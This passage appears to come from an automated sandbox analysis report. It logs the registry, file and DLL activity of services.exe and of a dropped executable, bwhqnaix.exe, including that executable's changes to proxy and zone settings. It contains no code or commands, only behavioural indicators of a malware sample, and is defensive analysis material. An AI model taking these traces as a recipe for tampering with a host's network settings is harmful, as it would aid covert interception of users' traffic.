C:\WINDOWS\system32\WS2HELP.dll  0x71AA0000  0x00008000 
C:\WINDOWS\system32\wtsapi32.dll  0x76F50000  0x00008000 

3.a) services.exe - Registry Activities

  - Registry Keys Created:  
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control

  - Registry Values Modified:  
Key Name New Value
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control  ActiveService  RasMan 
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control  ActiveService  TapiSrv 

  - Registry Values Read:  
Key Name Value Times
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0303\4&2C5A7332&0  ClassGUID  {4D36E96B-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0400\4&2C5A7332&0  ClassGUID  {4D36E978-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0501\1  ClassGUID  {4D36E978-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0700\4&2C5A7332&0  ClassGUID  {4D36E969-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0A03\1  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0F13\4&2C5A7332&0  ClassGUID  {4D36E96F-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI_HAL\PNP0C08\0  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\DISPLAY\DEFAULT_MONITOR\4&2946A9FF&0&11223344&00&02  ClassGUID  {4D36E96E-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\IDE\CDROMQEMU_QEMU_CD-ROM________________________0.9.____\4D51303030302033202020202020202020202020  ClassGUID  {4D36E965-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\IDE\DISKQEMU_HARDDISK___________________________0.9.1___\4D51303030302031202020202020202020202020  ClassGUID  {4D36E967-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ISAPNP\READDATAPORT\0  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\LPTENUM\MICROSOFTRAWPORT\5&34A37E9F&0&LPT1  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\PCIIDE\IDECHANNEL\4&3DE75EA&0&0  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\PCIIDE\IDECHANNEL\4&3DE75EA&0&1  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_1013&DEV_00B8&SUBSYS_00000000&REV_00\3&13C0B0C5&0&10  ClassGUID  {4D36E968-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\3&13C0B0C5&0&18  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\3&13C0B0C5&0&18  DeviceDesc  Realtek RTL8029(AS)-based Ethernet Adapter (Generic) 
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\3&13C0B0C5&0&18  Driver  {4D36E972-E325-11CE-BFC1-08002BE10318}\0001 
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_1237&SUBSYS_00000000&REV_02\3&13C0B0C5&0&00  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_7000&SUBSYS_00000000&REV_00\3&13C0B0C5&0&08  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_7010&SUBSYS_00000000&REV_00\3&13C0B0C5&0&09  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\ACPI_HAL\0000  ClassGUID  {4D36E966-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\DMIO\0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\FTDISK\0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_AFD\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_BEEP\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_DMBOOT\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_DMLOAD\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_FIPS\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_GPC\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_HTTP\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_IPNAT\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_IPSEC\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_KSECDD\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_MNMDD\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_MOUNTMGR\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDISTAPI\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDISUIO\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDIS\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDPROXY\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NETBT\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NULL\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_PARTMGR\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_PARVDM\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_RASACD\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_RDPCDD\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_TCPIP\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_VGASAVE\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_VOLSNAP\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_WANARP\0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMACM  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMDRV  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMMCI  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMVCD  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMVID  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_L2TPMINIPORT\0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000  DeviceDesc  WAN Miniport (IP) 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000  Driver  {4D36E972-E325-11CE-BFC1-08002BE10318}\0008 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPPOEMINIPORT\0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPTPMINIPORT\0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PSCHEDMP\0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PSCHEDMP\0001  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PTIMINIPORT\0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\RDPDR\0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\RDP_KBD\0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\RDP_MOU\0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0001  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0002  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\SYSTEM\CONTROLSET001\ENUM\STORAGE\VOLUME\1&30A96598&0&SIGNATURE95619561OFFSET7E00LENGTH13F291800  ClassGUID  {71A27CDD-812A-11D0-BEC7-08002BE2092F} 
HKLM\SYSTEM\CONTROLSET001\SERVICES\PlugPlay  PlugPlayServiceType 
HKLM\SYSTEM\CONTROLSET001\SERVICES\RasMan\Enum  Root\LEGACY_RASMAN\0000 
HKLM\SYSTEM\CONTROLSET001\SERVICES\RasMan\Enum  Count 
HKLM\SYSTEM\CONTROLSET001\SERVICES\RpcSs\Enum  Root\LEGACY_RPCSS\0000 
HKLM\SYSTEM\CONTROLSET001\SERVICES\RpcSs\Enum  Count 
HKLM\SYSTEM\CONTROLSET001\SERVICES\TapiSrv\Enum  Root\LEGACY_TAPISRV\0000 
HKLM\SYSTEM\CONTROLSET001\SERVICES\TapiSrv\Enum  Count 
HKLM\System\CurrentControlSet\Services\PlugPlay  ObjectName  LocalSystem 
HKLM\System\CurrentControlSet\Services\RasMan  ImagePath  %SystemRoot%\system32\svchost.exe -k netsvcs 
HKLM\System\CurrentControlSet\Services\RasMan  ObjectName  LocalSystem 
HKLM\System\CurrentControlSet\Services\RpcSs  ObjectName  NT Authority\NetworkService 
HKLM\System\CurrentControlSet\Services\TapiSrv  ImagePath  %SystemRoot%\System32\svchost.exe -k netsvcs 
HKLM\System\CurrentControlSet\Services\TapiSrv  ObjectName  LocalSystem 

3.b) services.exe - File Activities

  - Files Read:  
C:\ntsvcs, Flags: Named pipe

  - Files Modified:  
C:\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER, Flags: Named pipe
C:\WINDOWS\system32\config\SysEvent.Evt
C:\ntsvcs, Flags: Named pipe

  - File System Control Communication:  
File Control Code Times
C:\net\NtControlPipe4, Flags: Named pipe  0x0011C017 
C:\ntsvcs, Flags: Named pipe  0x0011001C 

3.c) services.exe - Process Activities

  - Thread Overview:  
Time Number of threads
After 227 seconds

4. bwhqnaix.exe

  - General information about this executable  
Analysis Reason: Started by sample.exe 
Filename: bwhqnaix.exe 
Command Line: c:\bwhqnaix.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\WINDOWS\system32\ntdll.dll  0x7C900000  0x000AF000 
C:\WINDOWS\system32\kernel32.dll  0x7C800000  0x000F6000 
C:\WINDOWS\system32\gdi32.dll  0x77F10000  0x00049000 
C:\WINDOWS\system32\USER32.dll  0x7E410000  0x00091000 
C:\WINDOWS\system32\msvcrt.dll  0x77C10000  0x00058000 
C:\WINDOWS\system32\IMM32.DLL  0x76390000  0x0001D000 
C:\WINDOWS\system32\ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\WINDOWS\system32\RPCRT4.dll  0x77E70000  0x00092000 
C:\WINDOWS\system32\Secur32.dll  0x77FE0000  0x00011000 

  - Run-time Dlls  
Module Name Base Address Size
C:\WINDOWS\system32\Normaliz.dll  0x00860000  0x00009000 
C:\WINDOWS\system32\iertutil.dll  0x42990000  0x00045000 
C:\WINDOWS\system32\WININET.dll  0x42C10000  0x000CF000 
C:\WINDOWS\system32\urlmon.dll  0x42CF0000  0x00127000 
C:\WINDOWS\system32\NETAPI32.dll  0x5B860000  0x00055000 
C:\WINDOWS\system32\comctl32.dll  0x5D090000  0x0009A000 
C:\WINDOWS\system32\hnetcfg.dll  0x662B0000  0x00058000 
C:\WINDOWS\System32\mswsock.dll  0x71A50000  0x0003F000 
C:\WINDOWS\System32\wshtcpip.dll  0x71A90000  0x00008000 
C:\WINDOWS\system32\WS2HELP.dll  0x71AA0000  0x00008000 
C:\WINDOWS\system32\ws2_32.dll  0x71AB0000  0x00017000 
C:\WINDOWS\system32\sensapi.dll  0x722B0000  0x00005000 
C:\WINDOWS\system32\DDRAW.dll  0x73760000  0x0004B000 
C:\WINDOWS\system32\DCIMAN32.dll  0x73BC0000  0x00006000 
C:\WINDOWS\system32\MSCTF.dll  0x74720000  0x0004C000 
C:\WINDOWS\system32\USERENV.dll  0x769C0000  0x000B4000 
C:\WINDOWS\system32\WINMM.dll  0x76B40000  0x0002D000 
C:\WINDOWS\system32\iphlpapi.dll  0x76D60000  0x00019000 
C:\WINDOWS\system32\rtutils.dll  0x76E80000  0x0000E000 
C:\WINDOWS\system32\rasman.dll  0x76E90000  0x00012000 
C:\WINDOWS\system32\TAPI32.dll  0x76EB0000  0x0002F000 
C:\WINDOWS\system32\RASAPI32.dll  0x76EE0000  0x0003C000 
C:\WINDOWS\system32\DNSAPI.dll  0x76F20000  0x00027000 
C:\WINDOWS\system32\rasadhlp.dll  0x76FC0000  0x00006000 
C:\WINDOWS\system32\OLEAUT32.dll  0x77120000  0x0008B000 
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll  0x773D0000  0x00103000 
C:\WINDOWS\system32\ole32.dll  0x774E0000  0x0013D000 
C:\WINDOWS\system32\SETUPAPI.dll  0x77920000  0x000F3000 
C:\WINDOWS\system32\Apphelp.dll  0x77B40000  0x00022000 
C:\WINDOWS\system32\msv1_0.dll  0x77C70000  0x00024000 
C:\WINDOWS\system32\SHLWAPI.dll  0x77F60000  0x00076000 
C:\WINDOWS\system32\SHELL32.dll  0x7C9C0000  0x00817000 

4.a) bwhqnaix.exe - Registry Activities

  - Registry Values Modified:  
Key Name New Value
HKLM\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT\Software\Microsoft\windows\CurrentVersion\Internet Settings  ProxyEnable 
HKLM\Software\Microsoft\DirectDraw\MostRecentApplication  ID  1246043638 
HKLM\Software\Microsoft\DirectDraw\MostRecentApplication  Name  bwhqnaix.exe 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Common AppData  C:\Documents and Settings\All Users\Application Data 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d14d83ce-7d74-11dc-97e2-806d6172696f}\  BaseClass  Drive 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d14d83cf-7d74-11dc-97e2-806d6172696f}\  BaseClass  Drive 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  AppData  C:\Documents and Settings\user\Application Data 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Cache  C:\Documents and Settings\user\Local Settings\Temporary Internet Files 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Cookies  C:\Documents and Settings\user\Cookies 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  History  C:\Documents and Settings\user\Local Settings\History 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Personal  C:\Documents and Settings\user\My Documents 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  AutoDetect 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  IntranetName 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  ProxyBypass 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  UNCAsIntranet 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings  MigrateProxy 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings  ProxyEnable 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections  SavedLegacySettings  0x460000006900000001000000000000000000000000000000040000000000 

  - Registry Values Read:  
Key Name Value Times
HKLM\SOFTWARE\CLASSES\.EXE    exefile 
HKLM\SOFTWARE\CLASSES\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\INPROCSERVER32    %SystemRoot%\system32\SHELL32.dll 
HKLM\SOFTWARE\CLASSES\DIRECTORY  AlwaysShowExt   
HKLM\SOFTWARE\CLASSES\DRIVE\SHELLEX\FOLDEREXTENSIONS\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}  DriveMask  32 
HKLM\SOFTWARE\CLASSES\MIME\DATABASE\CONTENT TYPE\TEXT/HTML  Extension  .htm  10 
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\  CUAS 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  EnablePunycode 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  UrlEncoding  0x00000000 
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager  CriticalSectionTimeout  2592000 
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters  Transports  0x5400630070006900700000004e0065007400420049004f00530000000000 
HKLM\SYSTEM\Setup  OsLoaderPath  \ 
HKLM\SYSTEM\Setup  SystemPartition  \Device\HarddiskVolume1 
HKLM\SYSTEM\Setup  SystemSetupInProgress 
HKLM\SYSTEM\WPA\MediaCenter  Installed 
HKLM\Software\Microsoft\DirectDraw\Compatibility\Bug!  Flags  0x01000000 
HKLM\Software\Microsoft\DirectDraw\Compatibility\Bug!  ID  0x3d620932 
HKLM\Software\Microsoft\DirectDraw\Compatibility\Bug!  Name  BUG!.EXE 
HKLM\Software\Microsoft\DirectDraw\Compatibility\DemolitionDerby2  Flags  0x01000000 
HKLM\Software\Microsoft\DirectDraw\Compatibility\DemolitionDerby2  ID  0x44838832 
HKLM\Software\Microsoft\DirectDraw\Compatibility\DemolitionDerby2  Name  DD2.EXE 
HKLM\Software\Microsoft\DirectDraw\Compatibility\MortalKombat3  Flags  0x01000000 
HKLM\Software\Microsoft\DirectDraw\Compatibility\MortalKombat3  ID  0xfc6de731 
HKLM\Software\Microsoft\DirectDraw\Compatibility\MortalKombat3  Name  MK3W.EXE 
HKLM\Software\Microsoft\DirectDraw\Compatibility\MsGolf98  Flags  0x20000000 
HKLM\Software\Microsoft\DirectDraw\Compatibility\MsGolf98  ID  0x0dea1a35 
HKLM\Software\Microsoft\DirectDraw\Compatibility\MsGolf98  Name  game.exe 
HKLM\Software\Microsoft\DirectDraw\Compatibility\NHLPowerPlay  Flags  0x01000000 
HKLM\Software\Microsoft\DirectDraw\Compatibility\NHLPowerPlay  ID  0xff3fbf31 
HKLM\Software\Microsoft\DirectDraw\Compatibility\NHLPowerPlay  Name  PP96.EXE 
HKLM\Software\Microsoft\DirectDraw\Compatibility\NortonSystemInfo  Flags  0x04000000 
HKLM\Software\Microsoft\DirectDraw\Compatibility\NortonSystemInfo  ID  0x29ea6332 
HKLM\Software\Microsoft\DirectDraw\Compatibility\NortonSystemInfo  Name  SI32.EXE 
HKLM\Software\Microsoft\DirectDraw\Compatibility\Rogue Squadron  Flags  0x40000000 
HKLM\Software\Microsoft\DirectDraw\Compatibility\Rogue Squadron  ID  0xd1d74c36 
HKLM\Software\Microsoft\DirectDraw\Compatibility\Rogue Squadron  Name  ROGUE SQUADRON.EXE 
HKLM\Software\Microsoft\DirectDraw\Compatibility\Savage  Flags  0x01000000 
HKLM\Software\Microsoft\DirectDraw\Compatibility\Savage  ID  0x00876531 
HKLM\Software\Microsoft\DirectDraw\Compatibility\Savage  Name  SAVAGE32.EXE 
HKLM\Software\Microsoft\DirectDraw\Compatibility\ScorchedPlanet  Flags  0x02000000 
HKLM\Software\Microsoft\DirectDraw\Compatibility\ScorchedPlanet  ID  0x69044c32 
HKLM\Software\Microsoft\DirectDraw\Compatibility\ScorchedPlanet  Name  SPLANETW.EXE 
HKLM\Software\Microsoft\DirectDraw\Compatibility\SilentThunder  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​SilentThunder  ID  ] 5V 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​SilentThunder  Name  A10SIM.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Terracide  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Terracide  ID  0x66cb9533 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Terracide  Name  TERAWIN.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ThirdDimension  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ThirdDimension  ID  0xbf817f32 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ThirdDimension  Name  t3rd.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisQualityBenchmark  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisQualityBenchmark  ID  m[M3 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisQualityBenchmark  Name  BEND3DIM.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisWinMarkBenchmark  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisWinMarkBenchmark  ID  0x46fc4b33 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisWinMarkBenchmark  Name  WBD3D.EXE 
HKLM\​Software\​Microsoft\​Internet Explorer\​Main\​FeatureControl\​FEATURE_BEHAVIORS 
HKLM\​Software\​Microsoft\​Internet Explorer\​Main\​FeatureControl\​FEATURE_DISABLE_MK_PROTOCOL 
HKLM\​Software\​Microsoft\​Rpc\​SecurityService  10  secur32.dll 
HKLM\​Software\​Microsoft\​Tracing  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  ConsoleTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableFileTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileDirectory  %windir%\​tracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  MaxFileSize  1048576 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  AllUsersProfile  All Users 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  DefaultUserProfile  Default User 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  ProfilesDirectory  %SystemDrive%\​Documents and Settings  10 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  ProfileImagePath  %SystemDrive%\​Documents and Settings\​user 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  CommonFilesDir  C:\​Program Files\​Common Files 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  DevicePath  %SystemRoot%\​inf 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  ProgramFilesDir  C:\​Program Files 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Common AppData  %ALLUSERSPROFILE%\​Application Data 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​Domains\​\​msn.com     
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​Domains\​\​msn.com\​related  http 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  DriverCachePath  %SystemRoot%\​Driver Cache 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  LogLevel 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  ServicePackCachePath  c:\​windows\​ServicePackFiles\​ServicePackCache 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  ServicePackSourcePath  c:\​windows\​ServicePackFiles 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  SourcePath  D:\​ 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
